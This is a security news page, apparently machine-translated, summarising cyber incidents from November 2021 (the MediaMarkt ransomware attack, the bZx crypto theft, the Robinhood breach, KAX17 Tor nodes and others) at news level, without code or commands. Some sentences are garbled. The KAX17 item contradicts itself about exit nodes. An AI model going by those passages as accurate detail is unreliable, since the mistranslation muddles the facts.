Connect with us

Overview of security incidents for the period from 4 to 10 November 2021



A brief overview of the main events in the world of information security for the week.

Unidentified persons stole $ 55 million from the bZx DeFi platform, spies stole data from the Pentagon’s defense contractor, China accused foreign intelligence of hacking its airlines, and ransomware Hive attacked Europe’s largest electronics retailer. Read about these and other high-profile events in the world of information security for the period from 4 to 10 November 2021 in our review.

Cybersecurity researchers at Cisco Talos have uncovered a new malware campaign from Babuk ransomware operators targeting ProxyShell vulnerabilities in Microsoft Exchange servers. Attackers use the China Chopper web shell to initially hack and install Babuk malware. Vulnerabilities (CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207) were fixed in April and May of this year, and technical details were published in August.

MediaMarkt, a large electronics and home appliance retailer, was cyberattacked using ransomware Hive, which shut down its IT systems and prevented stores in Germany and the Netherlands from operating normally. The ransomware demanded $ 240 million from MediaMarkt to recover encrypted files. The attack affected a number of retail stores in Europe, mainly in the Netherlands. Although there were no problems with online sales, cash registers could not accept credit cards or print receipts. In addition, the return of goods did not work due to the inability to view previous purchases.

The Chinese government said that in 2020 some foreign intelligence agency hacked several Chinese airlines and stole passenger data. The malicious campaign was discovered last week by officials from the Department of State Security after one of the affected airlines informed him of a data breach in January 2020. Security researchers have linked the hack to a custom Trojan used by cybercriminals to extract passenger data. Subsequent investigations showed that other airlines were compromised in a similar manner.

An unidentified group of hackers attacked nine organizations, including at least one in the United States, CNN reports. The attackers hacked into the networks of defense, energy and technology companies, as well as health and education institutions. Cybercriminals managed to steal passwords from a number of organizations, which gave them long-term access to the respective networks. This allows hackers to intercept sensitive information sent via email or stored on computer systems. The tactics of the hackers are the same as those of the well-known group of Chinese cybercriminals.

Electronic Warfare Associates (EWA), a US defense company, reported about the hacking of its mail system and the leakage of files containing personal information. The attacker seized control of one of the company’s email accounts on August 2, 2021, according to a statement filed by EWA with the Montana Attorney General’s Office. The hack was discovered when a hacker tried to pull off a fraudulent scheme (the company believes that fraud was its main goal). As shown by the investigation of the incident, the names and surnames, social security numbers and driver’s license data were compromised. Individuals affected by the leak were notified accordingly.

Unknown attackers tried to attack the popular investment and trading platform Robinhood, gained access to the email addresses and full names of its clients, and demanded a ransom. The incident was the result of the attackers using social engineering techniques on one of the customer support staff. Unknown persons convinced the employee that they had the right to access “support systems for a specific client”, and received from him access to the e-mail addresses of about 5 million customers and the full names of about 2 million customers. However, for a smaller number of customers, the leak became much more serious – their names, dates of birth, postal codes were compromised, and for ten users more account data were compromised.

One of the most notorious incidents of the week was the theft of $ 55 million in cryptocurrency from the DeFi platform bZx, which allows users to borrow and lend and speculate on fluctuations in the rate of cryptocurrencies. The platform developer received a phishing email containing a Word document with malicious macros disguised as a legitimate attachment. After opening a malicious attachment, a script was launched on the developer’s computer that compromised the mnemonic phrase for accessing his cryptocurrency wallet. The attacker emptied the developer’s wallet and stole two private keys used to integrate the bZx platform with the Polygon and Binance Smart Chain (BSC) blockchains. Using these keys, the hacker stole bZx funds from Polygon and BSC, along with funds from a small number of users who approved unlimited spending transactions for both tokens in their accounts.

Not without large-scale data leaks during the week. A database of 45.5 million users of mobile VPN services and has leaked to the Internet. The database contains email addresses, encrypted passwords, registration dates, profile updates and last login. All data is dated 2017-2021.

Participants in the Zero Day Initiative’s Pwn2Own Austin 2021 hacking contest have won awards for hacking printers for the first time in the history of the event. On Pwn2Own Austin’s first day of jailbreak, cybersecurity experts earned more than $ 360,000 in total from exploiting vulnerabilities in printers, NAS devices, routers and smart speakers.

Another interesting case is the blocking of the account of the head of Instagram, Adam Mosseri. Someone using the pseudonym Syenrai was able to temporarily block Mosseri’s account, convincing support that he had died. The account was blocked thanks to the ability to assign a memorable status to the Instagram accounts of deceased people. Some scammers even offer paid services to ban Instagram users, Syenrai explained. To assign commemorative status to an unconfirmed page with less than a million subscribers, they simply provide any obituary recently published on the Web as proof of death, and it takes users up to several days to restore access.

The Cybersecurity and Infrastructure Security Agency (CISA) has warned that the PoC code for the BrakTooth vulnerability in Bluetooth is already available on the Web. BrakTooth is the general name for about twenty vulnerabilities in the commercial Bluetooth Classic (BT) stacks. also affecting chips supporting Bluetooth versions 3.0 + HS to Bluetooth 5.2.

Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *


Hackers hacked the BitMart crypto exchange and stole $ 150 million.



The company is investigating the incident, and the withdrawal operations are temporarily suspended.

Crypto exchange BitMart reported that it was hacked, as a result of which it lost $ 150 million worth of cryptocurrency.

Exchange founder and CEO Sheldon Xia confirmed the incident and clarified that the vulnerability was related to hot wallets Ethereum (ETH) and Binance Smart Chain (BSC).

“We have identified a large-scale security breach involving one of our hot ETH wallets and one of our hot BSC wallets. At the moment, we are still drawing conclusions about the possible methods used. The hackers managed to withdraw assets worth about $ 150 million, ”Xia wrote on his Twitter account.

On the evening of December 4, PeckShield recorded an abnormal number of withdrawals from BitMart. Among the tokens that were withdrawn from the trading platform were “meme” tokens, including Shiba Inu, as well as the USDC stablecoin.

Recall that earlier hackers stole about $ 120 million in bitcoins and ether from the decentralized financial (DeFi) platform Badger, which allows users to borrow and lend and speculate on fluctuations in cryptocurrency prices.

Continue Reading


Cyberattack Electric Utilities Lost All Data in 25 Years



All indications are that the company has fallen victim to ransomware.

Colorado’s Delta-Montrose Electric Association (DMEA) is painfully recovering from a devastating cyberattack that destroyed all of its data over the past 25 years. An attack last month forced the company to shut down 90% of its internal computer systems.

A new notice sent out by DMEA to its customers this week says the company will begin accepting payments through the SmartHub platform and other payment terminals by December 6th. The company hopes to restore billing on December 6-10, so customers should expect an influx of electricity bills. At the same time, DMEA noted that it will not turn off services for non-payment and will not impose fines until January 31, 2022.

Employees of the company began to notice that something was wrong on November 7, and after a while almost the entire computer network of DMEA was turned off. The attack affected all support systems, payment processing tools, billing platforms and other tools provided to customers. According to the company, the hackers attacked certain segments of the internal network and damaged documents, tables and forms, indicating a ransomware attack.

Telephone systems and e-mail were also affected, but power plants and fiber-optic networks were not affected. The personal data of DMEA customers or employees has not been compromised.

DMEA has hired cybersecurity experts to investigate the incident, but is still struggling to rebuild the network.

“We are currently working with limited functionality and are focused on completing investigations and restoring services as efficiently, cost-effectively and securely as possible. We strive to restore our network and get back to normal operations, but this will take time and requires a phased approach, ”the company said.

Continue Reading


Hundreds of malicious Tor nodes are used to de-anonymize users



Malicious servers were added to the Tor network on an ongoing basis, and there were hundreds of them.

Since at least 2017, a mysterious attacker (or group), tracked by cybersecurity experts as KAX17, has been adding malicious servers to the Tor network, acting as entry, intermediary, and exit nodes. How thinks a security researcher using the pseudonym Nusenu, the campaign aimed to de-anonymize users.

Nusenu, which itself is the Tor node operator, discovered malicious activity in 2019, but says KAX17 has been in effect since at least 2017. According to Nusenu, malicious servers with no contact information were added to the Tor network on an ongoing basis, with hundreds of them. At its peak, the network included over 900 malicious servers.

In general, servers added to the Tor network must contain contact information (such as an email address) so that Tor administrators or law enforcement agencies can contact node operators in the event of misconfiguration or reports of abuse. Despite this rule, servers without contact information are often added to the network, mainly to maintain their numbers.

KAX17 servers are located in data centers around the world and are mostly configured as exit and intermediary nodes, with only a small number of them operating as exit nodes. As Nusenu notes, this is strange enough, since most attackers who manage malicious nodes configure them as exit nodes, which allows them to modify the traffic. For example, the BTCMITM20 group managed a network of thousands of malicious exit nodes to attack users visiting cryptocurrency-related sites.

According to the researcher, KAX17 collects information about users connecting to the Tor network, and then determines their routes. Nusenu reported its findings to the Tor Project last year, and the servers were removed from the network in October 2020. Soon after, another group of exit nodes appeared in Tor with no contact information, but whether it was associated with KAX17 is unclear.

In October and November 2021, the Tor Project also removed hundreds of KAX17 servers. Neither Nusenu nor the Tor Project have speculated yet on who is behind KAX17.

Continue Reading

Most Popular